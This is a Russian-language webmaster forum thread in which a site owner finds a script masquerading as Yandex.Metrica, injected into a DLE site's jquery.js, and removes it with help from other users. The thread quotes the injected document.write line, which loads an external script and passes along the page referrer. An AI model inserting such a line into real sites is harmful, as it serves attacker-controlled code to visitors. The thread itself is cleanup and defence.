Скрыть объявление
ВАШИ ПРАВА ОГРАНИЧЕНЫ!

Зарегистрируйтесь на форуме, чтобы стать полноценным участником сообщества!

Вопрос? Вирус или нет? yandex-metrica.ru

Тема в разделе "Вопросы- ответы", создана пользователем welop, 16 фев 2018.

16.02.18 в 11:48
06.11.18 в 10:05
13
907
0
  1. TopicStarter Overlay
    welop

    PRO Users

    Регистрация:
    26 авг 2016
    Сообщения:
    34
    Лучших ответов:
    0
    Рейтинги:
    +4 / 4 / -0
    Добрый день! Проблема в следующем: заметил, что сайт в последнее время стал долго загружаться. Решил проверить сайт на webpagetest.org.
    В итоге нашел непонятный код/скрипт (хз что это), который тормозит загрузку сайта. В этом коде указывается домен yandex-metrica.ru , который никак не относится к яндекс.метрике, т.е. маскируется под счетчик. В html коде сайта данного домена нет.

    Скрины проверки:
    749.jpg 750.jpg 751.jpg 752.jpg

    Адрес сайта заменил на site.ru, чтобы было видно в какой форме указывается домен: siteru или site.ru/page.html (любая страница сайта, которая проверяется)

    Вопрос: что это такое и как это удалить?

    p.s проверил сайт еще тут https://rescan.pro
    753.jpg
    адрес одной из ссылок такой :
    754.jpg
     
    #1 welop, 16 фев 2018
    Последнее редактирование: 16 фев 2018
  2. byroot

    Команда форума Администратор VIP Кинотрафик v2

    Регистрация:
    10 окт 2015
    Сообщения:
    10.990
    Лучших ответов:
    42
    Рейтинги:
    +4.599 / 41 / -50
  3. volodec

    volodec Посетитель

    Регистрация:
    17 фев 2017
    Сообщения:
    60
    Лучших ответов:
    0
    Рейтинги:
    +10 / 4 / -0
    Я бы искал так в firefox: F12 > Сеть > смотрю и тыкаю нужный запрос > стек-трейс
    Что мне это дало бы? узнал откуда в коде вызывается этот запрос ну, а дальше сам решай что да как
     
    • Нравится Нравится x 1
  4. TopicStarter Overlay
    welop

    PRO Users

    Регистрация:
    26 авг 2016
    Сообщения:
    34
    Лучших ответов:
    0
    Рейтинги:
    +4 / 4 / -0
    сделал
    скрипт вызывается в файле /engine/classes/min/index.php . Как я понял этот файл отвечает за сжатие js. В админ панели сжатие включено.

    В head прописано так <script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&amp;g=general&amp;17"></script>
    Открываю данную страницу. Нахожу данный домен yandex-metrica.ru в коде:

    document.write('<script type="text/javascript" src="Google*SITERU*?frm=script&se_referrer='+encodeURIComponent(document.referrer)+'"><'+'/script>');var S=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,T=["Top","Right","Bottom","Left"],U=function(a,b){retu.....

    Вместо *SITERU* - адрес сайта

    Но как его удалить, если данный код генерируется автоматически?
     
  5. volodec

    volodec Посетитель

    Регистрация:
    17 фев 2017
    Сообщения:
    60
    Лучших ответов:
    0
    Рейтинги:
    +10 / 4 / -0
    х.з. где это находится, но я бы искал через Notepad++ : ctrl+f > найти в файлах > в поле "найти" впиши дырявую ссылку > "заменить на" оставь пустым > "фильтр" *.* > "папка" :директория проекта целиком(для пущей надежности) > ждать
     
  6. TopicStarter Overlay
    welop

    PRO Users

    Регистрация:
    26 авг 2016
    Сообщения:
    34
    Лучших ответов:
    0
    Рейтинги:
    +4 / 4 / -0
    все, код нашел! как его удалить правильно, чтобы не нарушить файл? В php не силен(
    js3.JPG
    Выделил начало кода, где его конец - хз)

    UPD.
    Часть кода такая:

    }});document.write('<script type="text/javascript" src="Google*SITERU*?frm=script&se_referrer='+encodeURIComponent(document.referrer)+'"><'+'/script>');var
    S=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source


    Удалять то, что внутри ('...')? или начиная от document.write (и до куда)?
     
    #6 welop, 16 фев 2018
    Последнее редактирование: 16 фев 2018
  7. volodec

    volodec Посетитель

    Регистрация:
    17 фев 2017
    Сообщения:
    60
    Лучших ответов:
    0
    Рейтинги:
    +10 / 4 / -0
    и до первой точки с запятой( ; ) включительно. А что за файл, может он целиком не нужен?
     
  8. volodec

    volodec Посетитель

    Регистрация:
    17 фев 2017
    Сообщения:
    60
    Лучших ответов:
    0
    Рейтинги:
    +10 / 4 / -0
    хотя лучше сюда эту стоку дай посмотреть (до ; )
     
  9. TopicStarter Overlay
    welop

    PRO Users

    Регистрация:
    26 авг 2016
    Сообщения:
    34
    Лучших ответов:
    0
    Рейтинги:
    +4 / 4 / -0
    файл /engine/classes/js/jquery.js

    удалил, при редактировании файла этот код не находит, но когда открываешь файл в браузере - по-прежнему он есть.
     
  10. volodec

    volodec Посетитель

    Регистрация:
    17 фев 2017
    Сообщения:
    60
    Лучших ответов:
    0
    Рейтинги:
    +10 / 4 / -0
    А файл на сервер залил и кеш очистил?
     
    • Нравится Нравится x 1
  11. TopicStarter Overlay
    welop

    PRO Users

    Регистрация:
    26 авг 2016
    Сообщения:
    34
    Лучших ответов:
    0
    Рейтинги:
    +4 / 4 / -0
    Все, удалил код.
    Кэш на cloudflare пришлось чистить. Спасибо огромнейшее за помощь!!!
     
  12. byroot

    Команда форума Администратор VIP Кинотрафик v2

    Регистрация:
    10 окт 2015
    Сообщения:
    10.990
    Лучших ответов:
    42
    Рейтинги:
    +4.599 / 41 / -50
    нужно ставить все актуальные баг-фиксы для ДЛЕ, чтобы максимально минимизировать подобные случаи.
     
  13. valerchik

    valerchik Посетитель

    Регистрация:
    2 июн 2016
    Сообщения:
    55
    Лучших ответов:
    0
    Рейтинги:
    +10 / 0 / -0
    Установленные багфиксы не смогли противостоять внедрению этого вируса.
    Да, и указанный выше файл не редактировался с момента установки движка.
     
  14. byroot

    Команда форума Администратор VIP Кинотрафик v2

    Регистрация:
    10 окт 2015
    Сообщения:
    10.990
    Лучших ответов:
    42
    Рейтинги:
    +4.599 / 41 / -50
    Тема эта была когда ещё не было даже ДЛЕ 13 и 13.1! Используйте актуальные версии ДЛЕ по возможности, если нет - защищайте админку от брута админа, как защищать админку - уже много раз обсуждалось!
     
Яндекс.Метрика